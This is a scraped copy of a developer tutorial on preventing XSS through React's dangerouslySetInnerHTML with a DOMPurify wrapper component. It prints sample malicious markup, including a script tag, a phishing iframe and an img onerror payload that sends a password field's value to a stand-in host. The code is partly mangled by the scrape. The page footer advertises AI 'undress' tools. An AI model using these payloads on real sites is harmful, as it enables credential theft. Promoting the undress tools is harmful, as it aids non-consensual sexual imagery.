Cover image by Lautaro Andreani
...
TL: DR; Blinding dumping content into dangerouslySetInnerHTML is exactly that - dangerous. Make sure you are sanitising any input you pass to dangerouslySetInnerHTML unless you have explicit control of the input.
The following component serves as a simple example of mitigating the risk of an XSS attack via dangerouslySetInnerHTML:
//https://github.com/cure53/DOMPurify
import React from "react";
import DOMPurify from "dompurify";
const sanitize = (dirty) => DOMPurify.sanitize(dirty);
const DangerousHtml = ({ innerHTML, tag }) => {
const clean = sanitize(innerHTML);
if (typeof tag === "undefined") {
return <div dangerouslysetinnerhtml="{{" __html: clean></div>;
}
return <tag dangerouslysetinnerhtml="{{" __html: clean></tag>;
};
export default DangerousHtml;
By using our bespoke DangerousHtml component, we can dramatically reduce the risk of an XSS exploit as we're sanitising our input before it gets to the actual dangerouslySetInnerHTML prop
DOMPurify is highly configurable too, so it might be the case that you want to have multiple components like our example to handle specific use cases or allow some of the below examples explicitly.
Below are some brief examples of how the exploits could take place:
Exploiting iFrame and Script Tags
XSS is possible as React will not strip out the script tag which points to a malicious payload.
We really shouldn't be passing iFrames in this way either. Rather, we should pass the URL and any other "safe" attributes as a props and render it ourselves in an iFrame tag to retain control of it's rendering ability's and source, or have a dedicated iFrame component.
For example, consider rhe following malicious markup that we've received from an API request. If we blindly set it via dangerouslySetInnerHTML, we'll give the user this output:
// Bad markup going in
<div dangerouslysetinnerhtml="{{" __html:>
Hi
<script src="https://example.com/malicious-tracking"></script>
Fiona, here is the link to enter your bank details:
<iframe src="https://example.com/defo-not-the-actual-bank"></iframe>
`,
}}
/>
<pre class="brush:php;toolbar:false"><!-- Bad markup rendered on the DOM -->
<div>
<p>
Hi
<script src="https://example.com/malicious-tracking"></script>
Fiona, here is the link to enter your bank details:
<iframe src="https://example.com/defo-not-the-actual-bank"></iframe>
</p>
</div>
However, using our DangerousHTML component instead, means that we have mitigated most of the risk the user may have faced:
// Bad markup going in
<dangeroushtml innerhtml="{`<p">
Hi
<script src="https://example.com/malicious-tracking"></script>
Fiona, here is the link to enter your bank details:
<iframe src="https://example.com/defo-not-the-actual-bank"></iframe>
`}
/>
</dangeroushtml>
<!-- Clean markup rendered on the DOM --> <div> <p>Hi Fiona, here is the link to enter your bank details:</p> </div>
Fiona may think that the website is broken or missing content for some reason - but this is still better than being phished for their bank details!
Attribute manipulation/poisoning
Some DOM elements have special attributes that we can abuse that we should protect ourselves against.
In this example, we can run some JS on an
For example, given the following:
// Bad markup going in
<div dangerouslysetinnerhtml="{{" __html:>
Hola
<img src="/static/imghwm/default1.png" data-src="none.png" class="lazy" onerror='fetch("https://example.com/malicious-tracking?password=" + document.querySelector("input#password").value);' alt="Mitigate XSS exploits when using React&#s `dangerously SetInnerHTML`" >
Sharon
`,
}}
/>
<pre class="brush:php;toolbar:false"><!-- Bad markup rendered on the DOM -->
<div>
<p>
Hola
<img src="/static/imghwm/default1.png" data-src="none.png" class="lazy" onerror='fetch("https://example.com/malicious-tracking?password=" + document.querySelector("input#password").value);' alt="Mitigate XSS exploits when using React&#s `dangerously SetInnerHTML`" >
Sharon
</p>
</div>
In this instance, our poisoned markup is stealing data from the DOM when the image request eventually fails and the user will never even know.
We can mitigate this again with our DangerousHtml component
// Bad markup going in
<dangeroushtml innerhtml="{`">
Hola
<img src="/static/imghwm/default1.png" data-src="none.png" class="lazy" onerror='fetch("https://example.com/malicious-tracking?password=" + document.querySelector("input#password").value);' alt="Mitigate XSS exploits when using React&#s `dangerously SetInnerHTML`" >
Sharon
`}
/>
</dangeroushtml>
<!-- Clean markup rendered on the DOM -->
<div>
<p>
Hola
<img src="/static/imghwm/default1.png" data-src="none.png" class="lazy" alt="Mitigate XSS exploits when using React&#s `dangerously SetInnerHTML`" >
Sharon
</p>
</div>
Given the argument that we may genuinely want to execute some JS to show a fallback image, we should again not be trusting raw, unsanitized HTML to do this for us and would be better served either having a fallbackImageURL or onError prop that we can explicitly add to our image tag like so:
// Usual imports
const MyImageComponent = ({ fallbackUrl, url }) => {
// Usual component setup
const displayFallbackImage = (evt) => {
// If there is no fallback, do nothing
if (!fallbackUrl) return;
// set the url to the fallbackUrl
evt.target.src = fallbackUrl;
};
return (
<img src="%7Burl%7D" onerror="{displayFallbackImage}" ... any other props alt="Mitigate XSS exploits when using React&#s `dangerously SetInnerHTML`" >
);
};
...
Original article: https://timbryan.dev/posts/react-xss-via-dangerouslySetInnerHtml
The above is the detailed content of Mitigate XSS exploits when using React&#s `dangerously SetInnerHTML`. For more information, please follow other related articles on the PHP Chinese website!
Replace String Characters in JavaScriptMar 11, 2025 am 12:07 AMDetailed explanation of JavaScript string replacement method and FAQ This article will explore two ways to replace string characters in JavaScript: internal JavaScript code and internal HTML for web pages. Replace string inside JavaScript code The most direct way is to use the replace() method: str = str.replace("find","replace"); This method replaces only the first match. To replace all matches, use a regular expression and add the global flag g: str = str.replace(/fi
8 Stunning jQuery Page Layout PluginsMar 06, 2025 am 12:48 AMLeverage jQuery for Effortless Web Page Layouts: 8 Essential Plugins jQuery simplifies web page layout significantly. This article highlights eight powerful jQuery plugins that streamline the process, particularly useful for manual website creation
Build Your Own AJAX Web ApplicationsMar 09, 2025 am 12:11 AMSo here you are, ready to learn all about this thing called AJAX. But, what exactly is it? The term AJAX refers to a loose grouping of technologies that are used to create dynamic, interactive web content. The term AJAX, originally coined by Jesse J
10 Mobile Cheat Sheets for Mobile DevelopmentMar 05, 2025 am 12:43 AMThis post compiles helpful cheat sheets, reference guides, quick recipes, and code snippets for Android, Blackberry, and iPhone app development. No developer should be without them! Touch Gesture Reference Guide (PDF) A valuable resource for desig
Improve Your jQuery Knowledge with the Source ViewerMar 05, 2025 am 12:54 AMjQuery is a great JavaScript framework. However, as with any library, sometimes it’s necessary to get under the hood to discover what’s going on. Perhaps it’s because you’re tracing a bug or are just curious about how jQuery achieves a particular UI
10 jQuery Fun and Games PluginsMar 08, 2025 am 12:42 AM10 fun jQuery game plugins to make your website more attractive and enhance user stickiness! While Flash is still the best software for developing casual web games, jQuery can also create surprising effects, and while not comparable to pure action Flash games, in some cases you can also have unexpected fun in your browser. jQuery tic toe game The "Hello world" of game programming now has a jQuery version. Source code jQuery Crazy Word Composition Game This is a fill-in-the-blank game, and it can produce some weird results due to not knowing the context of the word. Source code jQuery mine sweeping game
How do I create and publish my own JavaScript libraries?Mar 18, 2025 pm 03:12 PMArticle discusses creating, publishing, and maintaining JavaScript libraries, focusing on planning, development, testing, documentation, and promotion strategies.
jQuery Parallax Tutorial - Animated Header BackgroundMar 08, 2025 am 12:39 AMThis tutorial demonstrates how to create a captivating parallax background effect using jQuery. We'll build a header banner with layered images that create a stunning visual depth. The updated plugin works with jQuery 1.6.4 and later. Download the
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
ZendStudio 13.5.1 Mac
Powerful PHP integrated development environment
Safe Exam Browser
Safe Exam Browser is a secure browser environment for taking online exams securely. This software turns any computer into a secure workstation. It controls access to any utility and prevents students from using unauthorized resources.
DVWA
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is very vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the process of securing web applications, and to help teachers/students teach/learn in a classroom environment Web application security. The goal of DVWA is to practice some of the most common web vulnerabilities through a simple and straightforward interface, with varying degrees of difficulty. Please note that this software
SublimeText3 English version
Recommended: Win version, supports code prompts!
VSCode Windows 64-bit Download
A free and powerful IDE editor launched by Microsoft
